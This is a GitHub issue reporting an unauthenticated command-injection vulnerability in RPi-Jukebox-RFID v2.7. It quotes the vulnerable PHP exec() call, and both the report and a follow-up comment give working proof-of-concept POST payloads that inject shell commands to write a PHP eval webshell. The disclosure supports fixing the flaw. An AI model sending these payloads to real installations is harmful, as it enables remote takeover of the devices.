Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

🐛 | RPi-Jukebox-RFID V2.7_RCE_3 #2398

Open
xjzzzxx opened this issue Jul 11, 2024 · 1 comment
Open

🐛 | RPi-Jukebox-RFID V2.7_RCE_3 #2398

xjzzzxx opened this issue Jul 11, 2024 · 1 comment
Labels
bug legacy_v2 Issues, discussions and PRs related to Version 2.x needs triage

Comments

@xjzzzxx
Copy link

xjzzzxx commented Jul 11, 2024

Version

v2.7.0

Branch

released

OS

ubuntu 22

Pi model

unknown

Hardware

No response

What happened?

Hello,

I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(No permissions required)

Analysis

The path of the vulnerability: htdocs\manageFilesFolders.php

if(											// Line 90(Check point)
    isset($post['folder'])
    && $post['folder'] != ""
    && file_exists($post['folder'])
    && is_dir($post['folder'])
) {
    $moveFolder = $post['folder'];			// Line 97(Source)
} else {
    $moveFolder = $Audio_Folders_Path;
}
if (
    isset($post['folderNew'])
    && $post['folderNew'] != ""
) {
    $moveFolder = $moveFolder . "/" . $post['folderNew'];	//Line 110(Source)
    if(!file_exists($Audio_Folders_Path . "/" . $moveFolder)) {
        $exec = 'mkdir "' . $moveFolder . '"; chown -R pi:www-data "' . $moveFolder . '"; sudo chmod -R 777 "' . $moveFolder . '"';		
        exec($exec);	// Line 115(Sink)
    } 
}

Source from Line 97 ($_POST['folder']) and Line 110($post['folderNew']).

And then there is a check point(Line 90) ,which we should set $_POST['folder'] = 2 to bypass.

After bypass the check point, the source(tainted) pass to $exec and exec($exec);(Line 115) without another check.

Poc

POST /htdocs/manageFilesFolders.php

Data:

ACTION=fileUpload&folder=2&folderNew=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell3.php++%3b+echo+%22hello

Here is the version without url encoding for ease of understanding:

ACTION=fileUpload&folder=2&folderNew=hello" ; echo "<?php @eval($_POST['pass']) ?>" > ./shell3.php ; echo "hello

Manual verification

5

6

The attacker can then easily connect to this webshell(/htdocs/shell3.php)

Logs

No response

Configuration

No response

More info

No response
@xjzzzxx xjzzzxx added bug legacy_v2 Issues, discussions and PRs related to Version 2.x needs triage labels Jul 11, 2024
@xjzzzxx
Copy link
Author

xjzzzxx commented Jul 12, 2024

I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:

Poc_fixed

POST /htdocs/manageFilesFolders.php

Data

ACTION=fileUpload&folder=2&folderNew=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%5c%24_POST%5b%27shell3%27%5d)+%3f%3e%22++%3e+.%2fshell3.php++%3b+echo+%22hello

Here is Data without url encoding for ease of understanding:

ACTION=fileUpload&folder=2&folderNew=hello" ; echo "<?php @eval(\$_POST['shell3']) ?>" > ./shell3.php ; echo "hello

Manual verification

15

16

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug legacy_v2 Issues, discussions and PRs related to Version 2.x needs triage
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@xjzzzxx